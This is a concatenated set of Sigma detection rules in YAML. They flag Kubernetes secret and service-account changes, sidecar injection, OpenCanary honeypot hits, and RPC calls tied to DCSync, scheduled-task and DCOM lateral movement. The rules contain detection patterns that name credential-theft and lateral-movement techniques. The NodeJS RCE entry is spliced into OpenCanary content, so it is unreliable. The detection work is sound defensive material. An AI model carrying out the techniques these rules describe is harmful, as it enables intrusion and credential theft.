kubernetes service: audit detection: selection: objectRef.resource: 'secrets' verb: - 'create' - 'delete' - 'patch' - 'replace' - 'update' condition: selection falsepositives: - Secrets being modified or deleted may be performed by a system administrator. - Automated processes may need to take these actions and may need to be filtered. 
level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml ================================================ title: New Kubernetes Service Account Created id: e31bae15-83ed-473e-bf31-faf4f8a17d36 related: - id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 type: derived status: test description: | Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster. references: - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.persistence - attack.t1136 logsource: category: application product: kubernetes service: audit detection: selection: verb: 'create' objectRef.resource: 'serviceaccounts' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml ================================================ title: Potential Sidecar Injection Into Running Deployment id: ad9012a6-e518-4432-9890-f3b82b8fc71f status: test description: | Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster. 
references: - https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/ author: Leo Tsaousis (@laripping) date: 2024-03-26 tags: - attack.t1609 - attack.execution logsource: category: application product: kubernetes service: audit detection: selection: verb: 'patch' apiGroup: 'apps' objectRef.resource: 'deployments' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml ================================================ title: Kubernetes Unauthorized or Unauthenticated Access id: 0d933542-1f1f-420d-97d4-21b2c3c492d9 status: test description: | Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained. references: - https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/ - https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues author: kelnage date: 2024-04-12 tags: - attack.privilege-escalation logsource: product: kubernetes service: audit detection: selection: responseStatus.code: - 401 # Unauthorized - 403 # Forbidden condition: selection falsepositives: - A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors. level: low ================================================ FILE: rules/application/nodejs/nodejs_rce_exploitation_attempt.yml ================================================ title: Potential RCE Exploitation Attempt In NodeJS id: 97661d9d-2beb-4630-b423-68985291a8af status: test description: Detects process execution related errors in NodeJS. 
If the exceptions are caused by user input, they may indicate an RCE vulnerability.
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.collection - attack.t1213 logsource: category: application product: opencanary detection: selection: logtype: 16001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_http_get.yml ================================================ title: OpenCanary - HTTP GET Request id: af6c3078-84cd-4c68-8842-08b76bd81b13 status: test description: Detects instances where an HTTP service on an OpenCanary node has received a GET request. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.initial-access - attack.t1190 logsource: category: application product: opencanary detection: selection: logtype: 3000 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_http_post_login_attempt.yml ================================================ title: OpenCanary - HTTP POST Login Attempt id: af1ac430-df6b-4b38-b976-0b52f07a0252 status: test description: | Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.initial-access - attack.t1190 logsource: category: application product: opencanary detection: selection: logtype: 3001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_httpproxy_login_attempt.yml ================================================ title: OpenCanary - HTTPPROXY Login Attempt id: 5498fc09-adc6-4804-b9d9-5cca1f0b8760 status: test description: | Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.initial-access - attack.defense-evasion - attack.command-and-control - attack.t1090 logsource: category: application product: opencanary detection: selection: logtype: 7001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_mssql_login_sqlauth.yml ================================================ title: OpenCanary - MSSQL Login Attempt Via SQLAuth id: 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd status: test description: | Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.credential-access - attack.collection - attack.t1003 - attack.t1213 logsource: category: application product: opencanary detection: selection: logtype: 9001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_mssql_login_winauth.yml ================================================ title: OpenCanary - MSSQL Login Attempt Via Windows Authentication id: 6e78f90f-0043-4a01-ac41-f97681613a66 status: test description: | Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.credential-access - attack.collection - attack.t1003 - attack.t1213 logsource: category: application product: opencanary detection: selection: logtype: 9002 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_mysql_login_attempt.yml ================================================ title: OpenCanary - MySQL Login Attempt id: e7d79a1b-25ed-4956-bd56-bd344fa8fd06 status: test description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.credential-access - attack.collection - attack.t1003 - attack.t1213 logsource: category: application product: opencanary detection: selection: logtype: 8001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_ntp_monlist.yml ================================================ title: OpenCanary - NTP Monlist Request id: 7cded4b3-f09e-405a-b96f-24248433ba44 status: test description: Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.impact - attack.t1498 logsource: category: application product: opencanary detection: selection: logtype: 11001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_portscan_nmap_fin_scan.yaml ================================================ title: OpenCanary - NMAP FIN Scan id: eae8c0c8-e5da-450a-9d7d-66aa56cd26b6 status: experimental description: Detects instances where an OpenCanary node has been targeted by a NMAP FIN Scan references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.discovery - attack.t1046 
logsource: category: application product: opencanary detection: selection: logtype: 5005 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_portscan_nmap_null_scan.yaml ================================================ title: OpenCanary - NMAP NULL Scan id: 68b8547b-107f-43f3-97fb-900a7d63c190 status: experimental description: Detects instances where an OpenCanary node has been targeted by a NMAP NULL Scan references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.discovery - attack.t1046 logsource: category: application product: opencanary detection: selection: logtype: 5003 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_portscan_nmap_os_scan.yaml ================================================ title: OpenCanary - NMAP OS Scan id: e8a677fd-248c-4eab-94df-de2f6f645884 status: experimental description: Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.discovery - attack.t1046 logsource: category: application product: opencanary detection: selection: logtype: 5002 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yaml ================================================ title: OpenCanary - 
NMAP XMAS Scan id: d7553d7b-f485-479c-b192-cdac6edd83a4 status: experimental description: Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.discovery - attack.t1046 logsource: category: application product: opencanary detection: selection: logtype: 5004 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_portscan_syn_scan.yaml ================================================ title: OpenCanary - Host Port Scan (SYN Scan) id: 974be8d2-283e-4033-ab08-7505b84204d0 status: experimental description: Detects instances where an OpenCanary node has been targeted by a SYN port scan. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.discovery - attack.t1046 logsource: category: application product: opencanary detection: selection: logtype: 5001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_rdp_connection_attempt.yaml ================================================ title: OpenCanary - RDP New Connection Attempt id: 598290cf-5932-45cd-9123-be1e05ab4f2e status: experimental description: Detects instances where an RDP service on an OpenCanary node has had a connection attempt. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Marco Pedrinazzi (@pedrinazziM) date: 2026-01-06 tags: - attack.initial-access - attack.lateral-movement - attack.t1133 - attack.t1021.001 logsource: category: application product: opencanary detection: selection: logtype: 14001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_redis_command.yml ================================================ title: OpenCanary - REDIS Action Command Attempt id: 547dfc53-ebf6-4afe-8d2e-793d9574975d status: test description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.credential-access - attack.collection - attack.t1003 - attack.t1213 logsource: category: application product: opencanary detection: selection: logtype: 17001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_sip_request.yml ================================================ title: OpenCanary - SIP Request id: e30de276-68ec-435c-ab99-ef3befec6c61 status: test description: Detects instances where an SIP service on an OpenCanary node has had a SIP request. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.collection - attack.t1123 logsource: category: application product: opencanary detection: selection: logtype: 15001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_smb_file_open.yml ================================================ title: OpenCanary - SMB File Open Request id: 22777c9e-873a-4b49-855f-6072ab861a52 status: test description: Detects instances where an SMB service on an OpenCanary node has had a file open request. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.lateral-movement - attack.collection - attack.t1021 - attack.t1005 logsource: category: application product: opencanary detection: selection: logtype: 5000 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_snmp_cmd.yml ================================================ title: OpenCanary - SNMP OID Request id: e9856028-fd4e-46e6-b3d1-10f7ceb95078 status: test description: Detects instances where an SNMP service on an OpenCanary node has had an OID request. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.discovery - attack.lateral-movement - attack.t1016 - attack.t1021 logsource: category: application product: opencanary detection: selection: logtype: 13001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_ssh_login_attempt.yml ================================================ title: OpenCanary - SSH Login Attempt id: ff7139bc-fdb1-4437-92f2-6afefe8884cb status: test description: Detects instances where an SSH service on an OpenCanary node has had a login attempt. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.privilege-escalation - attack.defense-evasion - attack.initial-access - attack.lateral-movement - attack.persistence - attack.t1133 - attack.t1021 - attack.t1078 logsource: category: application product: opencanary detection: selection: logtype: 4002 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_ssh_new_connection.yml ================================================ title: OpenCanary - SSH New Connection Attempt id: cd55f721-5623-4663-bd9b-5229cab5237d status: test description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.privilege-escalation - attack.defense-evasion - attack.initial-access - attack.lateral-movement - attack.persistence - attack.t1133 - attack.t1021 - attack.t1078 logsource: category: application product: opencanary detection: selection: logtype: 4000 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_telnet_login_attempt.yml ================================================ title: OpenCanary - Telnet Login Attempt id: 512cff7a-683a-43ad-afe0-dd398e872f36 status: test description: Detects instances where a Telnet service on an OpenCanary node has had a login attempt. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.command-and-control - attack.t1133 - attack.t1078 logsource: category: application product: opencanary detection: selection: logtype: 6001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_tftp_request.yml ================================================ title: OpenCanary - TFTP Request id: b4e6b016-a2ac-4759-ad85-8000b300d61e status: test description: Detects instances where a TFTP service on an OpenCanary node has had a request. 
references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.exfiltration - attack.t1041 logsource: category: application product: opencanary detection: selection: logtype: 10001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/opencanary/opencanary_vnc_connection_attempt.yml ================================================ title: OpenCanary - VNC Connection Attempt id: 9db5446c-b44a-4291-8b89-fcab5609c3b3 status: test description: Detects instances where a VNC service on an OpenCanary node has had a connection attempt. references: - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 author: Security Onion Solutions date: 2024-03-08 tags: - attack.lateral-movement - attack.t1021 logsource: category: application product: opencanary detection: selection: logtype: 12001 condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/application/python/app_python_sql_exceptions.yml ================================================ title: Python SQL Exceptions id: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9 status: stable description: Generic rule for SQL exceptions in Python according to PEP 249 references: - https://www.python.org/dev/peps/pep-0249/#exceptions author: Thomas Patzke date: 2017-08-12 modified: 2020-09-01 tags: - attack.initial-access - attack.t1190 logsource: category: application product: python detection: keywords: - DataError - IntegrityError - ProgrammingError - OperationalError condition: keywords falsepositives: - Application bugs level: medium 
================================================ FILE: rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml ================================================ title: Remote Schedule Task Lateral Movement via ATSvc id: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb status: test description: Detects remote RPC calls to create or execute a scheduled task via ATSvc references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.privilege-escalation - attack.lateral-movement - attack.execution - attack.persistence - attack.t1053 - attack.t1053.002 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b OpNum: - 0 - 1 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml ================================================ title: Remote Schedule Task Recon via AtScv id: f177f2bc-5f3e-4453-b599-57eefce9a59c status: test description: Detects remote RPC calls to read information about scheduled tasks via AtScv references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/zeronetworks/rpcfirewall - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - 
https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b filter: OpNum: - 0 - 1 condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml ================================================ title: Possible DCSync Attack id: 56fda488-113e-4ce9-8076-afc2457922c3 status: test description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.t1033 - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for "dangerous" opcodes (not 0,1 or 12) only from trusted IPs (DCs)' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2 filter: OpNum: - 0 - 1 - 12 condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml 
================================================ title: Remote Encrypting File System Abuse id: 5f92fff9-82e2-48eb-8fc1-8b133556a551 status: test description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.lateral-movement logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: - df1941c5-fe89-4e79-bf10-463657acf44d - c681d488-d850-11d0-8c52-00c04fd90f7e condition: selection falsepositives: - Legitimate usage of remote file encryption level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml ================================================ title: Remote Event Log Recon id: 2053961f-44c7-4a64-b62d-f6e72800af0d status: test description: Detects remote RPC calls to get event log information via EVEN or EVEN6 references: - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: - 
82273fdc-e32a-18c3-3f78-827929dc23ea - f6beaff7-1e19-4fbb-9f8f-b89e2018337c condition: selection falsepositives: - Remote administrative tasks on Windows Events level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml ================================================ title: Remote Schedule Task Lateral Movement via ITaskSchedulerService id: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d status: test description: Detects remote RPC calls to create or execute a scheduled task references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.privilege-escalation - attack.persistence - attack.execution - attack.lateral-movement - attack.t1053 - attack.t1053.002 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c OpNum: - 1 - 3 - 4 - 10 - 11 - 12 - 13 - 14 - 15 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml ================================================ title: Remote Schedule Task Recon via ITaskSchedulerService id: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e status: test description: Detects remote RPC calls to read information about scheduled tasks references: - 
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c filter: OpNum: - 1 - 3 - 4 - 10 - 11 - 12 - 13 - 14 - 15 condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml ================================================ title: Remote Printing Abuse for Lateral Movement id: bc3a4b0c-e167-48e1-aa88-b3020950e560 status: test description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.lateral-movement logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all 
processes with "audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: - 12345678-1234-abcd-ef00-0123456789ab - 76f03f96-cdfd-44fc-a22c-64950a001209 - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1 - ae33069b-a2a8-46ee-a235-ddfd339be281 condition: selection falsepositives: - Actual printing level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml ================================================ title: Remote DCOM/WMI Lateral Movement id: 68050b10-e477-4377-a99b-3721b422d6ef status: test description: Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.lateral-movement - attack.execution - attack.t1021.003 - attack.t1047 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 or 99fcfec4-5260-101b-bbcb-00aa0021347a or 000001a0-0000-0000-c000-000000000046 or 00000131-0000-0000-c000-000000000046 or 00000143-0000-0000-c000-000000000046 or 00000000-0000-0000-c000-000000000046" (the interfaces listed in the selection below; auditing only the service control manager interface would never produce these events)' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 - 99fcfec4-5260-101b-bbcb-00aa0021347a - 000001a0-0000-0000-c000-000000000046 - 00000131-0000-0000-c000-000000000046 - 00000143-0000-0000-c000-000000000046 - 00000000-0000-0000-c000-000000000046 condition: selection falsepositives: - Some administrative tasks on remote host level: high ================================================ FILE: 
